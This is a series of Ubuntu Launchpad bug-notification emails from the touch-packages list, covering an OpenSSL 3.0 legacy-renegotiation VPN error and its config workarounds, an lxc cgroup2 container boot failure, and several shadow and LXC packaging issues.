ssl_conf = ssl_sect

[ssl_sect]
system_default = system_default_sect

[system_default_sect]
Options = UnsafeLegacyRenegotiation

And then did OPENSSL_CONF=~/ssl.conf do-my-command

that works.  I don't know why the system-wide file does not.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834

Title:
  openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

Status in openssl package in Ubuntu:
  New

Bug description:
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
   Table de version :
   *** 3.0.1-0ubuntu1 500
  500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

  Using Ubuntu 22.04, I now get the following error message when
  attempting to connect to our office VPN using "gp-saml-gui
  (https://github.com/dlenski/gp-saml-gui)" :

  #
  dominique@Doombuntu:~$ .local/bin/gp-saml-gui  server_url
  Looking for SAML auth tags in response to 
https://server_url/global-protect/prelogin.esp...
  usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] 
[--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f 
EXTRA] server [openconnect_extra ...]
  gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] 
unsafe legacy renegotiation disabled (_ssl.c:997)
  #
  #
  #

  gp-saml-gui uses python module requests.
  Using python ide, I can get the same results  :

  #
  >>> r = requests.get('https://server_url')
  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, 
in urlopen
  httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, 
in _make_request
  self._validate_conn(conn)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, 
in _validate_conn
  conn.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in 
connect
  self.sock = ssl_wrap_socket(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in 
ssl_wrap_socket
  ssl_sock = _ssl_wrap_socket_impl(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in 
_ssl_wrap_socket_impl
  return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
  return self.sslsocket_class._create(
File "/usr/lib/python3.10/ssl.py", line 1070, in _create
  self.do_handshake()
File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
  self._sslobj.do_handshake()
  ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy 
renegotiation disabled (_ssl.c:997)

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in 
send
  resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, 
in urlopen
  retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in 
increment
  raise MaxRetryError(_pool, url, error or ResponseError(cause))
  urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation 
disabled (_ssl.c:997)')))

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
  return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
  return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in 
request
  resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in 
send
  r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in 
send
  raise SSLError(e, request=request)
  requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation 
disabled (_ssl.c:997)')))
  #
  #
  #

  I believe in OpenSSL 3.0 that SSL_OP_LEGACY_SERVER_CONNECT is now
  

[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

[Serge Hallyn]

I tried also adding the following:

[openssl_init]
providers = provider_sect
ssl_conf = ssl_configuration

as I wasn't sure whether the [ssl_configuration] section would otherwise
get used for anything, but that didn't seem to make a difference.

The end of the file is

[ssl_configuration]
client = client_tls_config

# https://www.mail-archive.com/openssl-users%40openssl.org/msg90598.htm
l
# https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1963834
[client_tls_config]
Options = UnsafeLegacyRenegotiation

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834

Title:
  openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

Status in openssl package in Ubuntu:
  New

Bug description:
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
   Table de version :
   *** 3.0.1-0ubuntu1 500
  500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

  Using Ubuntu 22.04, I now get the following error message when
  attempting to connect to our office VPN using "gp-saml-gui
  (https://github.com/dlenski/gp-saml-gui)" :

  #
  dominique@Doombuntu:~$ .local/bin/gp-saml-gui  server_url
  Looking for SAML auth tags in response to 
https://server_url/global-protect/prelogin.esp...
  usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] 
[--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f 
EXTRA] server [openconnect_extra ...]
  gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] 
unsafe legacy renegotiation disabled (_ssl.c:997)
  #
  #
  #

  gp-saml-gui uses python module requests.
  Using python ide, I can get the same results  :

  #
  >>> r = requests.get('https://server_url')
  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, 
in urlopen
  httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, 
in _make_request
  self._validate_conn(conn)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, 
in _validate_conn
  conn.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in 
connect
  self.sock = ssl_wrap_socket(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in 
ssl_wrap_socket
  ssl_sock = _ssl_wrap_socket_impl(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in 
_ssl_wrap_socket_impl
  return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
  return self.sslsocket_class._create(
File "/usr/lib/python3.10/ssl.py", line 1070, in _create
  self.do_handshake()
File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
  self._sslobj.do_handshake()
  ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy 
renegotiation disabled (_ssl.c:997)

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in 
send
  resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, 
in urlopen
  retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in 
increment
  raise MaxRetryError(_pool, url, error or ResponseError(cause))
  urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation 
disabled (_ssl.c:997)')))

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
  return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
  return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in 
request
  resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in 
send
  r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in 
send
  raise SSLError(e, request=request)
  requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe 

[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

[Serge Hallyn]

FWIW I'm seeing this with the openconnect-sso
(https://github.com/vlaci/openconnect-sso) package on jammy.  I just
tried adding the following to my /etc/ssl/openssl.cfg:

[ssl_configuration]
client = client_tls_config

[client_tls_config]
Options = UnsafeLegacyServerConnect

With no luck :(

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834

Title:
  openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

Status in openssl package in Ubuntu:
  New

Bug description:
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
   Table de version :
   *** 3.0.1-0ubuntu1 500
  500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

  Using Ubuntu 22.04, I now get the following error message when
  attempting to connect to our office VPN using "gp-saml-gui
  (https://github.com/dlenski/gp-saml-gui)" :

  #
  dominique@Doombuntu:~$ .local/bin/gp-saml-gui  server_url
  Looking for SAML auth tags in response to 
https://server_url/global-protect/prelogin.esp...
  usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] 
[--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f 
EXTRA] server [openconnect_extra ...]
  gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] 
unsafe legacy renegotiation disabled (_ssl.c:997)
  #
  #
  #

  gp-saml-gui uses python module requests.
  Using python ide, I can get the same results  :

  #
  >>> r = requests.get('https://server_url')
  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, 
in urlopen
  httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, 
in _make_request
  self._validate_conn(conn)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, 
in _validate_conn
  conn.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in 
connect
  self.sock = ssl_wrap_socket(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in 
ssl_wrap_socket
  ssl_sock = _ssl_wrap_socket_impl(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in 
_ssl_wrap_socket_impl
  return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
  return self.sslsocket_class._create(
File "/usr/lib/python3.10/ssl.py", line 1070, in _create
  self.do_handshake()
File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
  self._sslobj.do_handshake()
  ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy 
renegotiation disabled (_ssl.c:997)

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in 
send
  resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, 
in urlopen
  retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in 
increment
  raise MaxRetryError(_pool, url, error or ResponseError(cause))
  urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation 
disabled (_ssl.c:997)')))

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
  return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
  return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in 
request
  resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in 
send
  r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in 
send
  raise SSLError(e, request=request)
  requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation 
disabled (_ssl.c:997)')))
  #
  #
  #

  I believe in OpenSSL 3.0 that SSL_OP_LEGACY_SERVER_CONNECT is now
  disabled by default, as opposed to the version used in earlier 

[Touch-packages] [Bug 1917187] Re: lxc cgroup2: containers unbootable

[Serge Hallyn]

FWIW this is affecting me on jammy too.  I'll have to take a look at
systemd sources.  Adding:

lxc.init.cmd = /sbin/init systemd.unified_cgroup_hierarchy

to my config does not help, nor does bind mounting a /proc/filesystems
without 'cgroup' (v1) in it.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1917187

Title:
  lxc cgroup2: containers unbootable

Status in lxc package in Ubuntu:
  Invalid

Bug description:
  Distributor ID:   Ubuntu
  Description:  Ubuntu 20.04.2 LTS
  Release:  20.04
  Codename: focal

  
  If one sets in /etc/default/grub (as e.g. desired by facebook oomd):
  GRUB_CMDLINE_LINUX="systemd.unified_cgroup_hierarchy=1 swapaccount=1 ..."
  lxc is not able to start any containers anymore.

  # lxc-start -F n04-01
  lxc-start: n04-01: conf.c: lxc_setup_boot_id: 3249 Permission denied - Failed 
to mount /dev/.lxc-boot-id to /proc/sys/kernel/random/boot_id
 Failed to mount 
cgroup at /sys/fs/cgroup/systemd: Operation not permitted
  [!!] Failed to mount API filesystems.
  Exiting PID 1...

  
  config:
  ---
  # Common configuration
  lxc.include = /usr/share/lxc/config/ubuntu.common.conf

  # Container specific configuration
  lxc.apparmor.profile = lxc-default-cgns-with-mounting
  lxc.start.auto = 1
  lxc.rootfs.path = dir:/zones/n04-01/rootfs
  lxc.rootfs.options = noatime
  lxc.mount.fstab = /zones/n04-01/fstab
  lxc.uts.name = n04-01
  lxc.arch = amd64

  # Network configuration
  lxc.net.0.type = macvlan
  lxc.net.0.macvlan.mode = bridge
  lxc.net.0.flags = up
  lxc.net.0.link = vlan2
  lxc.net.0.hwaddr = 00:80:41:22:0d:10
  lxc.net.0.name = n04-01_0

  #lxc.include = /zones/n04-01/nvconfig

  lxc.start.order = 16
  #lxc.net.0.ipv4 = 10.2.1.65/16
  #lxc.net.0.ipv4.gateway = 10.2.0.1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1917187/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1869267] Re: /etc/login.defs contains a non-ASCII character

[Serge Hallyn]

This is in the debian/login.defs file, and was replaced at least before
bionic with a proper ascii ', so I'm targeting this to xenial.

** Changed in: shadow (Ubuntu)
   Status: New => Fix Released

** Also affects: shadow (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Changed in: shadow (Ubuntu Xenial)
   Status: New => Confirmed

** Changed in: shadow (Ubuntu Xenial)
   Importance: Undecided => Medium

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1869267

Title:
  /etc/login.defs contains a non-ASCII character

Status in shadow package in Ubuntu:
  Fix Released
Status in shadow source package in Xenial:
  Confirmed

Bug description:
  1) OS: Ubuntu 16.04.6 LTS

  2) Package: login 1:4.2-3.1ubuntu5.4 amd64 from xenial-updates/main

  3) After installing this package, I expect /etc/login.defs to contain
  only ASCII characters.

  4) Instead, /etc/login.defs contains an Acute Accent (Unicode U+00B4)
  on line 221 in a comment:

  === Quote From File ===

  # If set to yes, userdel will remove the user´s group if it contains
  no

  === End Quote ===

  This causes a problem in SaltStack:
  https://github.com/saltstack/salt/issues/55695

  SaltStack does recognize that they should do a better job at loading
  this file and is planning on fixing its problem. But I still question
  this: Should we expect /etc/login.defs to contain ASCII characters
  only?

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: login 1:4.2-3.1ubuntu5.4
  ProcVersionSignature: Ubuntu 4.4.0-1101.112-aws 4.4.208
  Uname: Linux 4.4.0-1101-aws x86_64
  ApportVersion: 2.20.1-0ubuntu2.21
  Architecture: amd64
  Date: Thu Mar 26 17:46:26 2020
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1869267/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1923262] Re: backup /etc/passwd- file should be mode 0600

[Serge Hallyn]

I appreciate you bringing this to our attention, but (as shadow upstream
maintainer) I'm going to join John in saying this should be wontfix.

Now if you want to change the subject to also making /etc/passwd 600,
then as Alexander points out that may be doable and have merit.  But
just hiding the backup file doesn't make sense, and as it would require
extra code in the already fiddly backup code in shadow, there is
regression concern.

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Won't Fix

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1923262

Title:
  backup /etc/passwd- file should be mode 0600

Status in shadow package in Ubuntu:
  Won't Fix

Bug description:
  CIS hardening benchmarks (6.1.6) suggest that the /etc/passwd- file
  should be mode 0600 (or more restrictive).

  However, this file is 0644 after it is created when the /etc/passwd
  file is modified. (Ie, a hardening script that creates a hardened
  system for initial use could change this mode, but it will go out of
  compliance the next time a backup file is made.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1923262/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1928309] Re: usermod change home directory no tilde

[Serge Hallyn]

Well that's just fascinating! :)

This would be best reported at https://github.com/shadow-
maint/shadow/issues.  Would you mind opening an issue there?

** Changed in: shadow (Ubuntu)
   Status: New => Confirmed

** Changed in: shadow (Ubuntu)
   Importance: Undecided => Wishlist

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1928309

Title:
  usermod change home directory no tilde

Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  I believe usermod is in the passwd package.

  Running `sudo usermod -d /home/username username` will result in
  correct terminal output as `username@hostname:~$`

  But running `sudo usermod -d /home/username/ username` will output
  `username@/home/username:~$`, since usermod does not drop the trailing
  forward slash and the string "/home/username/" does not match with
  "/home/username".

  This is a result of tab completion causing the extra forward slash.
  This bug is purely cosmetic.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: passwd 1:4.8.1-1ubuntu5.20.04
  ProcVersionSignature: User Name 5.4.0-1048.50-aws 5.4.106
  Uname: Linux 5.4.0-1048-aws x86_64
  ApportVersion: 2.20.11-0ubuntu27.17
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Thu May 13 08:08:56 2021
  Ec2AMI: ami-0d382e80be7ffdae5
  Ec2AMIManifest: (unknown)
  Ec2AvailabilityZone: us-west-1b
  Ec2InstanceType: c5n.4xlarge
  Ec2Kernel: unavailable
  Ec2Ramdisk: unavailable
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=C.UTF-8
   SHELL=/bin/bash
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1928309/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1923232] Re: SRU of LXC 4.0.6 to focal (upstream bugfix release)

[Serge Hallyn]

** Changed in: lxc (Ubuntu Focal)
   Status: New => In Progress

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1923232

Title:
  SRU of LXC 4.0.6 to focal (upstream bugfix release)

Status in lxc package in Ubuntu:
  New
Status in lxc source package in Focal:
  In Progress

Bug description:
  LXC released 4.0.6 as a bugfix release with the following changelog:

  - Improve handling for compatibility architectures for seccomp
  - Harden seccomp notifier implementation
  - Rework parsing of /proc//mountinfo to handle kernel regression
  - Improve network device restoration
  - Significantly cleanup and harden config file parsing
  - Support new capabilities CAP_PERFORM, CAP_BPF, and 
CAP_CHECKPOINT_RESTORE
  - Harden containers started without CAP_NET_ADMIN
* New upstream bugfix release (4.0.5):
  - Support allocating PTS devices from within the container
  - Harden more path/mount handling logics
  - Rework LSM logic to limit initializer use
* Cherry-pick upstream fixes:
  - 0002-commands-fix-check-for-seccomp-notify-support.patch
  - 0003-configure-skip-libseccomp-tests-if-it-is-disabled.patch
  - 0004-conf-fix-containers-retaining-CAP_NET_ADMIN.patch
  - 0005-cgroups-fix-cgroup-mounting.patch
  - 0006-lsm-remove-obsolute-comment-about-constructor.patch
  - 0007-lxc_attach-include-rexec-conditionally.patch
  - 0008-tree-wide-fix-some-header-inclusions.patch
  - 0009-initutils-fix-missing-includes.patch
  - 0010-configure-support-static-binaries.patch
  - 0011-autotools-enable-static-builds-for-tools.patch
  - 0012-autotools-enable-static-builds-for-commands.patch
  - 0013-tree-wide-fix-compilation-with-Wstrict-prototypes-Wo.patch
  - 0014-config-update-ax_pthread.m4.patch
  - 0015-configure-add-AC_SYS_LARGEFILE-checking.patch
  - 0016-autotools-update-build.patch
  - 0017-file_utils-introduce-read_file_at.patch
  - 0018-string_utils-add-must_make_path_relative.patch
  - 0019-cgroups-coding-style-fixes.patch
  - 0020-cgroups-rework-cg_unified_init.patch
  - 0021-cgroups-detect-and-record-cgroup2-freezer-support.patch
  - 0022-criu-handle-cgroup2-freezer.patch
  - 0023-mkdir-p-proc-sys-on-container-startup.patch
  - 0024-conf-fix-coding-style.patch
  - 0025-conf-coding-style-fixes.patch
  - 0026-conf-move-proc-and-sys-mountpoint-creation-int-lxc_m.patch
  - 0027-attach-invert-child-parent-handling.patch
  - 0028-attach-use-__do_free-cleanup-macro-for-cwd.patch
  - 0029-attach-tweak-logging.patch
  - 0030-attach-use-__do_close-for-labelfd.patch
  - 0031-attach-coding-style-fixes.patch
  - 0032-attach-use-free_disarm.patch
  - 0033-attach-s-attach_child_main-do_attach-g.patch
  - 0034-attach-mark-do_attach-as-__noreturn.patch
  - 0035-attach-make-do_attach-void.patch
  - 0036-attach-use-close_prot_errno_disarm.patch
  - 0037-attach-add-some-DEBUG-logging-to-stdfd-dpulication.patch
  - 0038-cgroups-fix-cgroup-mounting.patch
  - 0039-utils-fix-mount_at.patch
  - 0040-configure-fix-static-builds-with-clang-12-and-LTO.patch
  - 0041-cgroups-bpf-fixes.patch
  - 0042-croups-improve-__do_bpf_program_free.patch
  - 0043-cgroups-coding-style-fixes.patch
  - 0044-cgroups-don-t-initiliaze-NULL-log.patch
  - 0045-cgroups-ensure-all-memory-is-zeroed.patch
  - 0046-cgroups-use-zalloc.patch
  - 0047-cgroups-tweak-cgroup-initialization.patch
  - 0048-log-remove-pointless-inline.patch
  - 0049-log-add-lxc_log_get_fd.patch
  - 0050-seccomp-use-lxc_log_get_fd.patch
  - 0051-log-rework-lxc_log_get_level.patch
  - 0052-seccomp-use-lxc_log_get_level.patch
  - 0053-cgroups-use-bpf-log-when-logging-at-trace-level.patch
  - 0054-log-add-lxc_log_trace-helper.patch
  - 0055-cgroups-use-PTR_TO_U64.patch
  - 0056-cgroups-align-methods.patch
  - 0057-utils-use-SYSTRACE-when-logging-stdio-permission-fix.patch
  - 0058-attach-log-failues-to-dup2-with-SYSDEBUG.patch
  - 0059-attach-fix-logging-for-stdfd-replacement.patch
  - 0060-attach-fix-error-checking-for-dup2.patch
  - 0061-cgroups-initialize-variable.patch
  - 0062-commands_utils-don-t-leak-memory.patch
  - 0063-conf-use-lxc_log_trace.patch
  - 0064-confile_utils-use-lxc_log_trace.patch
  - 0065-rexec-check-lseek-return-value.patch

* Cherry-pick upstream bugfix:
  - cgroups: fix armhf builds

* Cherry-pick upstream bugfix:
  - cgfsng: fix cgroup attach cgroup creation

* New upstream bugfix release (4.0.4):
  - Support for new Linux clone flags (clone into cgroup)
  - Support for new Linux VFS system calls
  - Internal symbols are now properly hidden from external consumers
* New upstream bugfix release (4.0.3):
  - 

[Touch-packages] [Bug 1923232] Re: SRU of LXC 4.0.6 to focal (upstream bugfix release)

[Serge Hallyn]

** No longer affects: lxc (Ubuntu Bionic)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1923232

Title:
  SRU of LXC 4.0.6 to focal (upstream bugfix release)

Status in lxc package in Ubuntu:
  New
Status in lxc source package in Focal:
  New

Bug description:
  LXC released 4.0.6 as a bugfix release with the following changelog:

  - Improve handling for compatibility architectures for seccomp
  - Harden seccomp notifier implementation
  - Rework parsing of /proc//mountinfo to handle kernel regression
  - Improve network device restoration
  - Significantly cleanup and harden config file parsing
  - Support new capabilities CAP_PERFORM, CAP_BPF, and 
CAP_CHECKPOINT_RESTORE
  - Harden containers started without CAP_NET_ADMIN
* New upstream bugfix release (4.0.5):
  - Support allocating PTS devices from within the container
  - Harden more path/mount handling logics
  - Rework LSM logic to limit initializer use
* Cherry-pick upstream fixes:
  - 0002-commands-fix-check-for-seccomp-notify-support.patch
  - 0003-configure-skip-libseccomp-tests-if-it-is-disabled.patch
  - 0004-conf-fix-containers-retaining-CAP_NET_ADMIN.patch
  - 0005-cgroups-fix-cgroup-mounting.patch
  - 0006-lsm-remove-obsolute-comment-about-constructor.patch
  - 0007-lxc_attach-include-rexec-conditionally.patch
  - 0008-tree-wide-fix-some-header-inclusions.patch
  - 0009-initutils-fix-missing-includes.patch
  - 0010-configure-support-static-binaries.patch
  - 0011-autotools-enable-static-builds-for-tools.patch
  - 0012-autotools-enable-static-builds-for-commands.patch
  - 0013-tree-wide-fix-compilation-with-Wstrict-prototypes-Wo.patch
  - 0014-config-update-ax_pthread.m4.patch
  - 0015-configure-add-AC_SYS_LARGEFILE-checking.patch
  - 0016-autotools-update-build.patch
  - 0017-file_utils-introduce-read_file_at.patch
  - 0018-string_utils-add-must_make_path_relative.patch
  - 0019-cgroups-coding-style-fixes.patch
  - 0020-cgroups-rework-cg_unified_init.patch
  - 0021-cgroups-detect-and-record-cgroup2-freezer-support.patch
  - 0022-criu-handle-cgroup2-freezer.patch
  - 0023-mkdir-p-proc-sys-on-container-startup.patch
  - 0024-conf-fix-coding-style.patch
  - 0025-conf-coding-style-fixes.patch
  - 0026-conf-move-proc-and-sys-mountpoint-creation-int-lxc_m.patch
  - 0027-attach-invert-child-parent-handling.patch
  - 0028-attach-use-__do_free-cleanup-macro-for-cwd.patch
  - 0029-attach-tweak-logging.patch
  - 0030-attach-use-__do_close-for-labelfd.patch
  - 0031-attach-coding-style-fixes.patch
  - 0032-attach-use-free_disarm.patch
  - 0033-attach-s-attach_child_main-do_attach-g.patch
  - 0034-attach-mark-do_attach-as-__noreturn.patch
  - 0035-attach-make-do_attach-void.patch
  - 0036-attach-use-close_prot_errno_disarm.patch
  - 0037-attach-add-some-DEBUG-logging-to-stdfd-dpulication.patch
  - 0038-cgroups-fix-cgroup-mounting.patch
  - 0039-utils-fix-mount_at.patch
  - 0040-configure-fix-static-builds-with-clang-12-and-LTO.patch
  - 0041-cgroups-bpf-fixes.patch
  - 0042-croups-improve-__do_bpf_program_free.patch
  - 0043-cgroups-coding-style-fixes.patch
  - 0044-cgroups-don-t-initiliaze-NULL-log.patch
  - 0045-cgroups-ensure-all-memory-is-zeroed.patch
  - 0046-cgroups-use-zalloc.patch
